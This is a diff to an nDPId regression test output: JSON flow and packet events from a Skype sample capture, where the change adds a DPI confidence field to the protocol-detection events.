-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA82TgAAEARDlzAqAEinTg0GjLdnFoAKNB4nBYCAAvRN+bFqY3YyxruA93YXf9Qo41EFxKazlLBv\/8="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/\/94AAEARYWbAqAEiQAQXmzLdnEQAK4rqnBgCdE2WfHkd94c\/GZASHmkYP3mRsrUzW7aH679XKkCN7wg="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3cPYAAEARJ5XAqAEiQTffKTLdnFsAIyQanBoCqUIPvRhVKRfli2TsAPxez+o30kiStRum"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3VkAAEARCjDAqAEinTg0LzLdnF0AHgzhnBwC9HB1yp1CFIBUD5AqeEDWvWy7jA=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667019,"flow_last_seen":1431969667019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969667019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431969667019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969667019,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYg5AAEAG9xHAqAEinTeClsOAAbtI+pnpAAAAALAC\/\/+D\/AAAAgQFtAEDAwUBAQgKPiLrJgAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1431969667145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969667145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIgG7w4C5VVBeSPqZ6qASOJBi1AAAAgQFrAQCCApOt6EkPiLrJgEDAwk="}
@@ -395,64 +395,64 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvH9AAEAGnJDAqAEinTeCpsOBnFXYqqHbAAAAALAC\/\/9QDQAAAgQFtAEDAwUBAQgKPiLsxwAAAAAEAgAA"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SW0AAEAR5iPAqAEi1cezjTLdnE8AKQ5hnB4CGyqpujGNRC+tNfD9NfpLzFflMbzl80z6vtvIbjHD"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5JaMAAEARO5vAqAEiQAQXqDLdnEYAJeE7nCAClYKeY8U7yQoFLZ\/n5OmCV2u37neBgVGbscg="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/+CwAAEAR6vHAqAEinTc4jjLdnFcAKxxKnCIC+gceuOzI36Gk6bxAzIG\/CfJN2Kdzd\/KAG2cg42HExgA="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0paYAAEARVdzAqAEib91NjzLdnFYAIE1nnCQCSJLvZtGpgN01LZemo1XXZO+oxg0w"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAABBc7oAAEARJM\/AqAEiQTffITLdnEsALfH+nCYCgzglH2UUEeAloaKWvjnBLcR69MpntGSFdWneylROBFqJdg=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1431969667679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969667679,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIpxVw4FWpWbU2Kqh3KASOJCyZwAAAgQFrAQCCApOrGnnPiLsxwEDAwk="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1431969667679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969667679,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04YFAAEAGd5rAqAEinTeCpsOBnFXYqqHcVqVm1YAQECwIogAAAQEICj4i7bdOrGnn"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuzMAAEARQDfAqAEib91NmzLdnEQALFAWnCgCEvePRGLJGr6Sre+ODORDkQCce9O5GJ9D557YPiPEFuAx"}
